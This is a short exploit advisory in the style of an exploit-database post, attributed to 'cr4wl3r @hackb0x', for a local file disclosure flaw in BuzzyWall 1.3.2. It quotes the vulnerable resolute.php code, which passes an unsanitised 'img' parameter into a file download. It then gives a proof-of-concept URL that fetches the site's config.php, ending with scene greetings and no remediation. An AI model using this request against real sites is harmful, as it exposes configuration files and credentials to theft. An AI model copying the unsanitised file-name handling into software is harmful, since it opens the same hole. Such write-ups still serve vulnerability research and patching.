[~] BuzzyWall 1.3.2 (resolute.php) Local File Disclosure Exploit [~] Found by cr4wl3r @hackb0x [~] d0rk: no d0rk f0r kiddi0ts [~] Script: http://sourceforge.net/projects/buzzywall/files/buzzywall/ err0r c0de resolute.php <?PHP header ("Content-type: image/jpeg"); $img = $_GET['img']; header('Content-Disposition: attachment; filename="'.$img.'"'); $percent = $_GET['percent']; $constrain = $_GET['constrain']; $w = $_GET['w']; $h = $_GET['h']; .... [~] p0c: http://target/resolute.php?img=config.php thx: valentin, xoron, irvian, cyberlog, EA ngel, Minato